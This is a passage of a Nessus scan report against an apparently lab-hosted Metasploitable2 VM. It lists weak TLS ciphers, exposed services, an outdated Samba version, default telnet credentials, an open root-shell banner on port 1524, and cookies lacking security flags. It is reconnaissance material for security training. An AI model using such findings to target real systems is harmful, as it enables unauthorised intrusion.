DES-CBC-SHA 0x00, 0x09 RSA RSA DES-CBC(56) SHA1

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DES-CBC3-MD5 0x07, 0x00, 0xC0 RSA RSA 3DES-CBC(168) MD5
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
ADH-DES-CBC3-SHA 0x00, 0x1B DH None 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
RC4-MD5 0x01, 0x00, 0x80 RSA RSA RC4(128) MD5
DHE-RSA-AES128-SHA 0x00, 0x33 DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA 0x00, 0x39 DH RSA AES-CBC(256) SHA1
ADH-AES128-SHA 0x00, 0x34 DH None AES-CBC(128) SHA1
ADH-AES256-SHA 0x00, 0x3A DH None AES-CBC(256) SHA1
ADH-RC4-MD5 0x00, 0x18 DH None RC4(128) MD5
AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1
AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1
RC4-MD5 0x00, 0x04 RSA RSA RC4(128) MD5
RC4-SHA 0x00, 0x05 RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

156899 - SSL/TLS Recommended Cipher Suites
-
Synopsis
The remote host advertises discouraged SSL/TLS ciphers.
Description
The remote host has open SSL/TLS ports which advertise discouraged cipher suites. It is recommended to only enable support for the following cipher suites:

TLSv1.3:
- 0x13,0x01 TLS13_AES_128_GCM_SHA256
- 0x13,0x02 TLS13_AES_256_GCM_SHA384
- 0x13,0x03 TLS13_CHACHA20_POLY1305_SHA256

TLSv1.2:
- 0xC0,0x2B ECDHE-ECDSA-AES128-GCM-SHA256
- 0xC0,0x2F ECDHE-RSA-AES128-GCM-SHA256
- 0xC0,0x2C ECDHE-ECDSA-AES256-GCM-SHA384
- 0xC0,0x30 ECDHE-RSA-AES256-GCM-SHA384
- 0xCC,0xA9 ECDHE-ECDSA-CHACHA20-POLY1305
- 0xCC,0xA8 ECDHE-RSA-CHACHA20-POLY1305

This is the recommended configuration for the vast majority of services, as it is highly secure and compatible with nearly every client released in the last five (or more) years.
See Also
Solution
Only enable support for recommened cipher suites.
Risk Factor
None
Plugin Information
Published: 2022/01/20, Modified: 2024/02/12
Plugin Output

tcp/5432/postgresql

The remote host has listening SSL/TLS ports which advertise the discouraged cipher suites outlined below:


Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA 0x00, 0x33 DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA 0x00, 0x39 DH RSA AES-CBC(256) SHA1
AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1
AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1
RC4-SHA 0x00, 0x05 RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

25240 - Samba Server Detection
-
Synopsis
An SMB server is running on the remote host.
Description
The remote host is running Samba, a CIFS/SMB server for Linux and Unix.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/05/16, Modified: 2022/10/12
Plugin Output

tcp/445/cifs

104887 - Samba Version
-
Synopsis
It was possible to obtain the samba version from the remote operating system.
Description
Nessus was able to obtain the samba version from the remote operating by sending an authentication request to port 139 or 445. Note that this plugin requires SMB1 to be enabled on the host.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2017/11/30, Modified: 2019/11/22
Plugin Output

tcp/445/cifs


The remote Samba Version is : Samba 3.0.20-Debian
96982 - Server Message Block (SMB) Protocol Version 1 Enabled (uncredentialed check)
-
Synopsis
The remote Windows host supports the SMBv1 protocol.
Description
The remote Windows host supports Server Message Block Protocol version 1 (SMBv1). Microsoft recommends that users discontinue the use of SMBv1 due to the lack of security features that were included in later SMB versions. Additionally, the Shadow Brokers group reportedly has an exploit that affects SMB; however, it is unknown if the exploit affects SMBv1 or another version. In response to this, US-CERT recommends that users disable SMBv1 per SMB best practices to mitigate these potential issues.
See Also
Solution
Disable SMBv1 according to the vendor instructions in Microsoft KB2696547. Additionally, block SMB directly by blocking TCP port 445 on all network boundary devices. For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.
Risk Factor
None
References
XREF IAVT:0001-T-0710
Plugin Information
Published: 2017/02/03, Modified: 2020/09/22
Plugin Output

tcp/445/cifs


The remote host supports SMBv1.

22964 - Service Detection
-
Synopsis
The remote service could be identified.
Description
Nessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/08/19, Modified: 2024/03/26
Plugin Output

tcp/22/ssh

An SSH server is running on this port.

22964 - Service Detection
-
Synopsis
The remote service could be identified.
Description
Nessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/08/19, Modified: 2024/03/26
Plugin Output

tcp/23/telnet

A telnet server is running on this port.

22964 - Service Detection
-
Synopsis
The remote service could be identified.
Description
Nessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/08/19, Modified: 2024/03/26
Plugin Output

tcp/25/smtp

An SMTP server is running on this port.

22964 - Service Detection
-
Synopsis
The remote service could be identified.
Description
Nessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/08/19, Modified: 2024/03/26
Plugin Output

tcp/80/www

A web server is running on this port.

22964 - Service Detection
-
Synopsis
The remote service could be identified.
Description
Nessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/08/19, Modified: 2024/03/26
Plugin Output

tcp/2121/ftp

An FTP server is running on this port.

22964 - Service Detection
-
Synopsis
The remote service could be identified.
Description
Nessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/08/19, Modified: 2024/03/26
Plugin Output

tcp/3306/mysql

A MySQL server is running on this port.

22964 - Service Detection
-
Synopsis
The remote service could be identified.
Description
Nessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/08/19, Modified: 2024/03/26
Plugin Output

tcp/5900/vnc

A vnc server is running on this port.

22964 - Service Detection
-
Synopsis
The remote service could be identified.
Description
Nessus was able to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/08/19, Modified: 2024/03/26
Plugin Output

tcp/8180/www

A web server is running on this port.

17975 - Service Detection (GET request)
-
Synopsis
The remote service could be identified.
Description
It was possible to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
References
XREF IAVT:0001-T-0935
Plugin Information
Published: 2005/04/06, Modified: 2021/10/27
Plugin Output

tcp/6667/irc

An IRC daemon is listening on this port.

11153 - Service Detection (HELP Request)
-
Synopsis
The remote service could be identified.
Description
It was possible to identify the remote service by its banner or by looking at the error message it sends when it receives a 'HELP'
request.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2002/11/18, Modified: 2024/11/19
Plugin Output

tcp/21/ftp

An FTP server seems to be running on this port.

25220 - TCP/IP Timestamps Supported
-
Synopsis
The remote service implements TCP timestamps.
Description
The remote host implements TCP timestamps, as defined by RFC1323. A side effect of this feature is that the uptime of the remote host can sometimes be computed.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/05/16, Modified: 2023/10/17
Plugin Output

tcp/0

11819 - TFTP Daemon Detection
-
Synopsis
A TFTP server is listening on the remote port.
Description
The remote host is running a TFTP (Trivial File Transfer Protocol) daemon. TFTP is often used by routers and diskless hosts to retrieve their configuration. It can also be used by worms to propagate.
Solution
Disable this service if you do not use it.
Risk Factor
None
Plugin Information
Published: 2003/08/13, Modified: 2022/12/28
Plugin Output

udp/69/tftp

19941 - TWiki Detection
-
Synopsis
The remote web server hosts a Wiki system written in Perl.
Description
The remote host is running TWiki, an open source wiki system written in Perl.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2005/10/06, Modified: 2023/05/24
Plugin Output

tcp/80/www


URL : http://metasploitable2.sicurform/twiki/bin/view/Main
Version : 01 Feb 2003

110723 - Target Credential Status by Authentication Protocol - No Credentials Provided
-
Synopsis
Nessus was able to find common ports used for local checks, however, no credentials were provided in the scan policy.
Description
Nessus was not able to successfully authenticate directly to the remote target on an available authentication protocol. Nessus was able to connect to the remote port and identify that the service running on the port supports an authentication protocol, but Nessus failed to authenticate to the remote service using the provided credentials. There may have been a protocol failure that prevented authentication from being attempted or all of the provided credentials for the authentication protocol may be invalid. See plugin output for error details.

Please note the following :

- This plugin reports per protocol, so it is possible for valid credentials to be provided for one protocol and not another. For example, authentication may succeed via SSH but fail via SMB, while no credentials were provided for an available SNMP service.

- Providing valid credentials for all available authentication protocols may improve scan coverage, but the value of successful authentication for a given protocol may vary from target to target depending upon what data (if any) is gathered from the target via that protocol. For example, successful authentication via SSH is more valuable for Linux targets than for Windows targets, and likewise successful authentication via SMB is more valuable for Windows targets than for Linux targets.
Solution
n/a
Risk Factor
None
References
XREF IAVB:0001-B-0504
Plugin Information
Published: 2018/06/27, Modified: 2024/04/19
Plugin Output

tcp/0

SSH was detected on port 22 but no credentials were provided.
SSH local checks were not enabled.

10281 - Telnet Server Detection
-
Synopsis
A Telnet server is listening on the remote port.
Description
The remote host is running a Telnet server, a remote terminal server.
Solution
Disable this service if you do not use it.
Risk Factor
None
Plugin Information
Published: 1999/10/12, Modified: 2020/06/12
Plugin Output

tcp/23/telnet

Here is the banner from the remote Telnet server :

------------------------------ snip ------------------------------
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


04cbebc48a57 login:
------------------------------ snip ------------------------------

10287 - Traceroute Information
-
Synopsis
It was possible to obtain traceroute information.
Description
Makes a traceroute to the remote host.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 1999/11/27, Modified: 2023/12/04
Plugin Output

udp/0

For your information, here is the traceroute from 172.19.0.4 to 172.19.0.2 :
172.19.0.4
172.19.0.2

Hop Count: 1

11154 - Unknown Service Detection: Banner Retrieval
-
Synopsis
There is an unknown service running on the remote host.
Description
Nessus was unable to identify a service on the remote host even though it returned a banner of some type.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2002/11/18, Modified: 2022/07/26
Plugin Output

tcp/1524


If you know what this service is and think the banner could be used to
identify it, please send a description of the service along with the
following output to svc-signatures@nessus.org :

Port : 1524
Type : spontaneous
Banner :
0x00: 72 6F 6F 74 40 30 34 63 62 65 62 63 34 38 61 35 root@04cbebc48a5
0x10: 37 3A 2F 23 20 7:/#

11154 - Unknown Service Detection: Banner Retrieval
-
Synopsis
There is an unknown service running on the remote host.
Description
Nessus was unable to identify a service on the remote host even though it returned a banner of some type.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2002/11/18, Modified: 2022/07/26
Plugin Output

tcp/8787


If you know what this service is and think the banner could be used to
identify it, please send a description of the service along with the
following output to svc-signatures@nessus.org :

Port : 8787
Type : get_http
Banner :
0x0000: 00 00 00 03 04 08 46 00 00 03 A1 04 08 6F 3A 16 ......F......o:.
0x0010: 44 52 62 3A 3A 44 52 62 43 6F 6E 6E 45 72 72 6F DRb::DRbConnErro
0x0020: 72 07 3A 07 62 74 5B 17 22 2F 2F 75 73 72 2F 6C r.:.bt[."//usr/l
0x0030: 69 62 2F 72 75 62 79 2F 31 2E 38 2F 64 72 62 2F ib/ruby/1.8/drb/
0x0040: 64 72 62 2E 72 62 3A 35 37 33 3A 69 6E 20 60 6C drb.rb:573:in `l
0x0050: 6F 61 64 27 22 37 2F 75 73 72 2F 6C 69 62 2F 72 oad'"7/usr/lib/r
0x0060: 75 62 79 2F 31 2E 38 2F 64 72 62 2F 64 72 62 2E uby/1.8/drb/drb.
0x0070: 72 62 3A 36 31 32 3A 69 6E 20 60 72 65 63 76 5F rb:612:in `recv_
0x0080: 72 65 71 75 65 73 74 27 22 37 2F 75 73 72 2F 6C request'"7/usr/l
0x0090: 69 62 2F 72 75 62 79 2F 31 2E 38 2F 64 72 62 2F ib/ruby/1.8/drb/
0x00A0: 64 72 62 2E 72 62 3A 39 31 31 3A 69 6E 20 60 72 drb.rb:911:in `r
0x00B0: 65 63 76 5F 72 65 71 75 65 73 74 27 22 3C 2F 75 ecv_request'"</u
0x00C0: 73 72 2F 6C 69 62 2F 72 75 62 79 2F 31 2E 38 2F sr/lib/ruby/1.8/
0x00D0: 64 72 62 2F 64 72 62 2E 72 62 3A 31 35 33 30 3A drb/drb.rb:1530:
0x00E0: 69 6E 20 60 69 6E 69 74 5F 77 69 74 68 5F 63 6C in `init_with_cl
0x00F0: 69 65 6E 74 27 22 39 2F 75 73 72 2F 6C 69 62 2F ient'"9/usr/lib/
0x0100: 72 75 62 79 2F 31 2E 38 2F 64 72 62 2F 64 72 62 ruby/1.8/drb/drb
0x0110: 2E 72 62 3A 31 35 34 32 3A 69 6E 20 60 73 65 74 .rb:1542:in `set
0x0120: 75 70 5F 6D 65 73 73 61 67 65 27 22 33 2F 75 73 up_message'"3/us
0x0130: 72 2F 6C 69 62 2F 72 75 62 79 2F 31 2E 38 2F 64 r/lib/ruby/1.8/d
0x0140: 72 62 2F 64 72 62 2E 72 62 3A 31 34 39 34 3A 69 rb/drb.rb:1494:i
0x0150: 6E 20 60 70 65 72 66 6F 72 6D 27 22 35 2F 75 73 n `perform'"5/us
0x0160: 72 2F 6C 69 62 2F 72 75 62 79 2F 31 2E 38 2F 64 r/lib/ruby/1.8/d
0x0170: 72 62 2F 64 72 62 2E 72 62 3A 31 35 38 39 3A 69 rb/drb.rb:1589:i
0x0180: 6E 20 60 6D 61 69 6E 5F 6C 6F 6F 70 27 22 30 2F n `main_loop'"0/
0x0190: 75 73 72 2F 6C 69 62 2F 72 75 62 79 2F 31 2E 38 usr/lib/ruby/1.8
0x01A0: 2F 64 72 62 2F 64 72 62 2E 72 62 3A 31 35 38 35 /drb/drb.rb:1585
0x01B0: 3A 69 6E 20 60 6C 6F 6F 70 27 22 35 2F 75 73 72 :in `loop'"5/usr
0x01C0: 2F 6C 69 62 2F 72 75 62 79 2F 31 2E 38 2F 64 72 /lib/ruby/1.8/dr
0x01D0: 62 2F 64 72 62 2E 72 62 3A 31 35 38 35 3A 69 6E b/drb.rb:1585:in
0x01E0: 20 60 6D 61 69 6E 5F 6C 6F 6F 70 27 22 31 2F 75 `main_loop'"1/u
0x01F0: 73 72 2F 6C 69 62 2F 72 75 62 79 2F 31 2E 38 2F sr/lib/ruby/1.8/
0x0200: 64 72 62 2F 64 72 62 2E 72 62 3A 31 35 38 31 3A drb/drb.rb:1581:
0x0210: 69 6E 20 60 73 74 61 72 74 27 22 35 2F 75 73 72 in `start'"5/usr
0x0220: 2F 6C 69 62 2F 72 75 62 79 2F 31 2E 38 2F 64 72 /lib/ruby/1.8/dr
0x0230: 62 2F 64 72 62 2E 72 62 3A 31 35 38 31 3A 69 6E b/drb.rb:1581:in
0x0240: 20 60 6D 61 69 6E 5F 6C 6F 6F 70 27 22 2F 2F 75 `main_loop'"//u
0x0250: 73 72 2F 6C 69 62 2F 72 75 62 79 2F 31 2E 38 2F sr/lib/ruby/1.8/
0x0260: 64 72 62 2F 64 72 62 2E 72 62 3A 31 34 33 30 3A drb/drb.rb:1430:
0x0270: 69 6E 20 60 72 75 6E 27 22 31 2F 75 73 72 2F 6C in `run'"1/usr/l
0x0280: 69 62 2F 72 75 62 79 2F 31 2E 38 2F 64 72 62 2F ib/ruby/1.8/drb/
0x0290: 64 72 62 2E 72 62 3A 31 34 32 37 3A 69 6E 20 60 drb.rb:1427:in `
0x02A0: 73 74 61 72 74 27 22 2F 2F 75 73 72 2F 6C 69 62 start'"//usr/lib
0x02B0: 2F 72 75 62 79 2F 31 2E 38 2F 64 72 62 2F 64 72 /ruby/1.8/drb/dr
0x02C0: 62 2E 72 62 3A 31 34 32 37 3A 69 6E 20 60 72 75 b.rb:1427:in `ru
0x02D0: 6E 27 22 36 2F 75 73 72 2F 6C 69 62 2F 72 75 62 n'"6/usr/lib/rub
0x02E0: 79 2F 31 2E 38 2F 64 72 62 2F 64 72 62 2E 72 62 y/1.8/drb/drb.rb
0x02F0: 3A 31 33 34 37 3A 69 6E 20 60 69 6E 69 74 69 61 :1347:in `initia
0x0300: 6C 69 7A 65 27 22 2F 2F 75 73 72 2F 6C 69 62 2F lize'"//usr/lib/
0x0310: 72 75 62 79 2F 31 2E 38 2F 64 72 62 2F 64 72 62 ruby/1.8/drb/drb
0x0320: 2E 72 62 3A 31 36 32 37 3A 69 6E 20 60 6E 65 77 .rb:1627:in `new
0x0330: 27 22 39 2F 75 73 72 2F 6C 69 62 2F 72 75 62 79 '"9/usr/lib/ruby
0x0340: 2F 31 2E 38 2F 64 72 62 2F 64 72 62 2E 72 62 3A /1.8/drb/drb.rb:
0x0350: 31 36 32 37 3A 69 6E 20 60 73 74 61 72 74 5F 73 1627:in `start_s
0x0360: 65 72 76 69 63 65 27 22 25 2F 75 73 72 2F 73 62 ervice'"%/usr/sb
0x0370: 69 6E 2F 64 72 75 62 79 5F 74 69 6D 65 73 65 72 in/druby_timeser
0x0380: 76 65 72 2E 72 62 3A 31 32 3A 09 6D 65 73 67 22 ver.rb:12:.mesg"
0x0390: 20 74 6F 6F 20 6C 61 72 67 65 20 70 61 63 6B 65 too large packe
0x03A0: 74 20 31 31 39 35 37 32 35 38 35 36 t 1195725856

19288 - VNC Server Security Type Detection
-
Synopsis
A VNC server is running on the remote host.
Description
This script checks the remote VNC server protocol version and the available 'security types'.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2005/07/22, Modified: 2021/07/13
Plugin Output

tcp/5900/vnc

\nThe remote VNC server chose security type #2 (VNC authentication)
65792 - VNC Server Unencrypted Communication Detection
-
Synopsis
A VNC server with one or more unencrypted 'security-types' is running on the remote host.
Description
This script checks the remote VNC server protocol version and the available 'security types' to determine if any unencrypted 'security-types' are in use or available.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2013/04/03, Modified: 2014/03/12
Plugin Output

tcp/5900/vnc


The remote VNC server supports the following security type
which does not perform full data communication encryption :

2 (VNC authentication)
10342 - VNC Software Detection
-
Synopsis
The remote host is running a remote display software (VNC).
Description
The remote host is running VNC (Virtual Network Computing), which uses the RFB (Remote Framebuffer) protocol to provide remote access to graphical user interfaces and thus permits a console on the remote host to be displayed on another.
See Also
Solution
Make sure use of this software is done in accordance with your organization's security policy and filter incoming traffic to this port.
Risk Factor
None
Plugin Information
Published: 2000/03/07, Modified: 2017/06/12
Plugin Output

tcp/5900/vnc


The highest RFB protocol version supported by the server is :

3.3

135860 - WMI Not Available
-
Synopsis
WMI queries could not be made against the remote host.
Description
WMI (Windows Management Instrumentation) is not available on the remote host over DCOM. WMI queries are used to gather information about the remote host, such as its current state, network interface configuration, etc.

Without this information Nessus may not be able to identify installed software or security vunerabilities that exist on the remote host.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2020/04/21, Modified: 2025/06/16
Plugin Output

tcp/445/cifs

Can't connect to the 'root\CIMV2' WMI namespace.

100669 - Web Application Cookies Are Expired
-
Synopsis
HTTP cookies have an 'Expires' attribute that is set with a past date or time.
Description
The remote web application sets various cookies throughout a user's unauthenticated and authenticated session. However, Nessus has detected that one or more of the cookies have an 'Expires' attribute that is set with a past date or time, meaning that these cookies will be removed by the browser.
See Also
Solution
Each cookie should be carefully reviewed to determine if it contains sensitive data or is relied upon for a security decision.

If needed, set an expiration date in the future so the cookie will persist or remove the Expires cookie attribute altogether to convert the cookie to a session cookie.
Risk Factor
None
Plugin Information
Published: 2017/06/07, Modified: 2021/12/20
Plugin Output

tcp/80/www


The following cookies are expired :

Name : pma_fontsize
Path : /phpMyAdmin/
Value : deleted
Domain :
Version : 1
Expires : Wed, 19-Jun-2024 09:39:51 GMT
Comment :
Secure : 0
Httponly : 0
Port :


Name : pma_collation_connection
Path : /phpMyAdmin/
Value : deleted
Domain :
Version : 1
Expires : Wed, 19-Jun-2024 09:40:09 GMT
Comment :
Secure : 0
Httponly : 1
Port :


Name : pma_theme
Path : /phpMyAdmin/
Value : deleted
Domain :
Version : 1
Expires : Wed, 19-Jun-2024 09:39:50 GMT
Comment :
Secure : 0
Httponly : 0
Port :

100669 - Web Application Cookies Are Expired
-
Synopsis
HTTP cookies have an 'Expires' attribute that is set with a past date or time.
Description
The remote web application sets various cookies throughout a user's unauthenticated and authenticated session. However, Nessus has detected that one or more of the cookies have an 'Expires' attribute that is set with a past date or time, meaning that these cookies will be removed by the browser.
See Also
Solution
Each cookie should be carefully reviewed to determine if it contains sensitive data or is relied upon for a security decision.

If needed, set an expiration date in the future so the cookie will persist or remove the Expires cookie attribute altogether to convert the cookie to a session cookie.
Risk Factor
None
Plugin Information
Published: 2017/06/07, Modified: 2021/12/20
Plugin Output

tcp/8180/www


The following cookies are expired :

Name : pma_fontsize
Path : /phpMyAdmin/
Value : deleted
Domain :
Version : 1
Expires : Wed, 19-Jun-2024 09:39:51 GMT
Comment :
Secure : 0
Httponly : 0
Port :


Name : pma_collation_connection
Path : /phpMyAdmin/
Value : deleted
Domain :
Version : 1
Expires : Wed, 19-Jun-2024 09:40:09 GMT
Comment :
Secure : 0
Httponly : 1
Port :


Name : pma_theme
Path : /phpMyAdmin/
Value : deleted
Domain :
Version : 1
Expires : Wed, 19-Jun-2024 09:39:50 GMT
Comment :
Secure : 0
Httponly : 0
Port :

85601 - Web Application Cookies Not Marked HttpOnly
-
Synopsis
HTTP session cookies might be vulnerable to cross-site scripting attacks.
Description
The remote web application sets various cookies throughout a user's unauthenticated and authenticated session. However, one or more of those cookies are not marked 'HttpOnly', meaning that a malicious client-side script, such as JavaScript, could read them. The HttpOnly flag is a security mechanism to protect against cross-site scripting attacks, which was proposed by Microsoft and initially implemented in Internet Explorer. All modern browsers now support it.

Note that this plugin detects all general cookies missing the HttpOnly cookie flag, whereas plugin 48432 (Web Application Session Cookies Not Marked HttpOnly) will only detect session cookies from an authenticated session missing the HttpOnly cookie flag.
See Also
Solution
Each cookie should be carefully reviewed to determine if it contains sensitive data or is relied upon for a security decision.

If possible, add the 'HttpOnly' attribute to all session cookies and any cookies containing sensitive data.
Risk Factor
None
References
XREF CWE:20
XREF CWE:74
XREF CWE:79
XREF CWE:442
XREF CWE:629
XREF CWE:711
XREF CWE:712
XREF CWE:722
XREF CWE:725
XREF CWE:750
XREF CWE:751
XREF CWE:800
XREF CWE:801
XREF CWE:809
XREF CWE:811
XREF CWE:864
XREF CWE:900
XREF CWE:928
XREF CWE:931
XREF CWE:990
Plugin Information
Published: 2015/08/24, Modified: 2015/08/24
Plugin Output

tcp/80/www


The following cookies do not set the HttpOnly cookie flag :

Name : JSESSIONID
Path : /admin
Value : 699B572747CD478A3F4F04BB62455889
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : JSESSIONID
Path : /jsp-examples
Value : E6A8CD9B75B21367575E3EABBC982256
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : PHPSESSID
Path : /
Value : fa3735aa13431fbdd0ca536ca5b09aef
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : JSESSIONID
Path : /servlets-examples
Value : AF7481CB01B7F78DFE04CCC70B5470C0
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : security
Path : /
Value : high
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :

85601 - Web Application Cookies Not Marked HttpOnly
-
Synopsis
HTTP session cookies might be vulnerable to cross-site scripting attacks.
Description
The remote web application sets various cookies throughout a user's unauthenticated and authenticated session. However, one or more of those cookies are not marked 'HttpOnly', meaning that a malicious client-side script, such as JavaScript, could read them. The HttpOnly flag is a security mechanism to protect against cross-site scripting attacks, which was proposed by Microsoft and initially implemented in Internet Explorer. All modern browsers now support it.

Note that this plugin detects all general cookies missing the HttpOnly cookie flag, whereas plugin 48432 (Web Application Session Cookies Not Marked HttpOnly) will only detect session cookies from an authenticated session missing the HttpOnly cookie flag.
See Also
Solution
Each cookie should be carefully reviewed to determine if it contains sensitive data or is relied upon for a security decision.

If possible, add the 'HttpOnly' attribute to all session cookies and any cookies containing sensitive data.
Risk Factor
None
References
XREF CWE:20
XREF CWE:74
XREF CWE:79
XREF CWE:442
XREF CWE:629
XREF CWE:711
XREF CWE:712
XREF CWE:722
XREF CWE:725
XREF CWE:750
XREF CWE:751
XREF CWE:800
XREF CWE:801
XREF CWE:809
XREF CWE:811
XREF CWE:864
XREF CWE:900
XREF CWE:928
XREF CWE:931
XREF CWE:990
Plugin Information
Published: 2015/08/24, Modified: 2015/08/24
Plugin Output

tcp/8180/www


The following cookies do not set the HttpOnly cookie flag :

Name : JSESSIONID
Path : /admin
Value : 699B572747CD478A3F4F04BB62455889
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : JSESSIONID
Path : /jsp-examples
Value : E6A8CD9B75B21367575E3EABBC982256
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : PHPSESSID
Path : /
Value : fa3735aa13431fbdd0ca536ca5b09aef
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : JSESSIONID
Path : /servlets-examples
Value : AF7481CB01B7F78DFE04CCC70B5470C0
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : security
Path : /
Value : high
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :

85602 - Web Application Cookies Not Marked Secure
-
Synopsis
HTTP session cookies might be transmitted in cleartext.
Description
The remote web application sets various cookies throughout a user's unauthenticated and authenticated session. However, there are instances where the application is running over unencrypted HTTP or the cookies are not marked 'secure', meaning the browser could send them back over an unencrypted link under certain circumstances. As a result, it may be possible for a remote attacker to intercept these cookies.

Note that this plugin detects all general cookies missing the 'secure'
cookie flag, whereas plugin 49218 (Web Application Session Cookies Not Marked Secure) will only detect session cookies from an authenticated session missing the secure cookie flag.
See Also
Solution
Each cookie should be carefully reviewed to determine if it contains sensitive data or is relied upon for a security decision.

If possible, ensure all communication occurs over an encrypted channel and add the 'secure' attribute to all session cookies or any cookies containing sensitive data.
Risk Factor
None
References
XREF CWE:522
XREF CWE:718
XREF CWE:724
XREF CWE:928
XREF CWE:930
Plugin Information
Published: 2015/08/24, Modified: 2015/08/24
Plugin Output

tcp/80/www


The following cookies do not set the secure cookie flag :

Name : JSESSIONID
Path : /admin
Value : 699B572747CD478A3F4F04BB62455889
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : pma_theme
Path : /phpMyAdmin/
Value : original
Domain :
Version : 1
Expires : Sat, 19-Jul-2025 09:37:47 GMT
Comment :
Secure : 0
Httponly : 1
Port :


Name : pma_fontsize
Path : /phpMyAdmin/
Value : 82%25
Domain :
Version : 1
Expires : Sat, 19-Jul-2025 09:37:47 GMT
Comment :
Secure : 0
Httponly : 1
Port :


Name : JSESSIONID
Path : /jsp-examples
Value : E6A8CD9B75B21367575E3EABBC982256
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : PHPSESSID
Path : /
Value : fa3735aa13431fbdd0ca536ca5b09aef
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 0
Port :


Name : phpMyAdmin
Path : /phpMyAdmin/
Value : 04942ffae0ebce5f92b60b1b678205fb960d2050
Domain :
Version : 1
Expires :
Comment :
Secure : 0
Httponly : 1
Port :


Name : pma_lang
Path : /phpMyAdmin/
Value : en-utf-8
Domain :
Version : 1
Expires : Sat, 19-Jul-2025 09:37:47 GMT
Comment :
Secure : 0
Httponly : 1
Port :


Name : pma_charset
Path : /phpMyAdmin/
Value : utf-8
Domain :
Version : 1
Expires : Sat, 19-Jul-2025 09:37:47 GMT
Comment :
Secure : 0
Httponly : 1
Port :


Name : JSESSIONID
Path : /servlets-examples
Value : AF7481CB01B7F78DFE04CCC70B5470C0
Domain :
